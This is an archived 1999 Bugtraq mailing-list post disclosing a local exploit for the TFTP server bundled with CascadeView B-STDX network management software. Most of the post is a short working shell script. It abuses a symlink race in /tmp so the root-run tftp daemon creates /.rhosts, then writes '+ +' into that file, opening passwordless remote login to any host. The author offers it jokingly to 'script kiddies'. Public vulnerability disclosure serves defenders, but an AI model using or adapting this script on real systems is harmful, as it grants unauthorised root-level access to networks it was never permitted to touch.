[13170] in bugtraq
tftpserv.sh
daemon@ATHENA.MIT.EDU (Loneguard)
Fri Dec 31 13:25:12 1999
Message-Id: <19991231164825.3B3211F5F7@lists.securityfocus.com>
Date: Fri, 31 Dec 1999 08:48:25 -0800
Reply-To: Loneguard <loneguard@CRAZYMONKEY.ORG>
From: Loneguard <loneguard@CRAZYMONKEY.ORG>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
CascadeView is an network management system that ships with an
exploitable TFTP server. Incase anyone misses the significance
of this, you control the NMS you control the network :) Here's
a local exploit to tied the script kiddies over...
#!/bin/sh
#
# tftpserv.sh - Loneguard 07/03/99
#
# Buggy tftp server shipped with CascadeView B-STDX 8000/9000
#
rm /tmp/tftpd_xfer_status.log
ln -s /.rhosts /tmp/tftpd_xfer_status.log
echo KungFu > crazymonkey
( sleep 1 ; echo put crazymonkey ; sleep 1 ; echo quit ) | tftp 127.1
echo "+ +" > /.rhosts
